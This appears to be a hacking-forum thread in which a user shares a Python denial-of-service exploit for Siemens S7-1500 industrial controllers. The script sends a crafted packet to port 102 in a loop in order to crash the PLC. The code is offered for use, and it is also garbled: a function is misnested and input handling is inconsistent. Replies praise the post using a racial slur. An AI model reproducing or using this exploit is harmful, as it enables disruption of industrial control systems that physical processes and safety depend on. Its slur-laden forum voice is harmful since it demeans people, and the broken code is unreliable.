[POC] Siemens s7-1500 DoS Exploit
by 303 - Thursday December 28, 2023 at 05:36 PM
#1
Hello Everyone! today i want share my proof of concept of siemens s7-1500 DoS vulnerability.
I hope you like it!

## Title: Siemens s7-1500 poC
## This piece of code is a proof of concept for the Siemens s7-1500 PLC.
## It will crash the PLC and make it unresponsive.
## author: g0d

import socket
import sys

target = input("Enter the IP address of the PLC: ")
print("The PLC IP address is: ", target)
port = input("Enter the port number of the PLC: ")
print("The PLC port number is: ", port)



## crafted payload we will use
payload = "\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x00\x00\x01\x00\xc1\x02\x01\x00\xc2\x02\x01\x02"


## Now we connect to the plc in order to send the payload
## we will use port 102 for this
def connection(payload):
    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection.connect((sys.argv[1], 102))
    connection.send(payload)
    connection.close()

## this function perfoms a DoS attack on the PLC using the crafted payload
    def dos(payload, target, port):
        while True:
            connection(payload)
            print("Sending payload to the PLC: ", target, "on port: ", port)
## crafted payload we will use
            dos = "\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x00\x00\x01\x00\xc1\x02\x01\x00\xc2\x02\x01\x02"
            connection(dos)
            print("Sending payload to the PLC: ", target, "on port: ", port)
            print('Exploit completed! ( :')
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#2
+rep vouch + nigger + cyber nigger + yes + W
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Legend
Reply
#3
Amazing, thanks for sharing this amazing vulnerability sir
Reply
#4
(12-28-2023, 05:38 PM)IntelBroker Wrote: +rep vouch + nigger + cyber nigger + yes + W


thanks nigger Rolleyes
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#5
It is rare to see an PoC for PLC, thanks for the share!
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  new wordpress website takeover vuln (video + poc ) zinzeur 313 27,277 03-28-2026, 02:43 AM
Last Post: toshi99
  [POC] Google OAuth "MultiLogin" endpoint 0-day Farfallaiero 106 13,201 02-10-2026, 03:34 PM
Last Post: birhikayemvar
  Ban Any Discord Exploit PhineasFisher 6 295 02-08-2026, 11:49 PM
Last Post: skype
  Cool Remote Patching ETW/Amsi PoC pepeloco 6 2,092 02-08-2026, 07:58 AM
Last Post: zeroday99
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 73 02-07-2026, 03:32 PM
Last Post: cysc



 Users browsing this thread: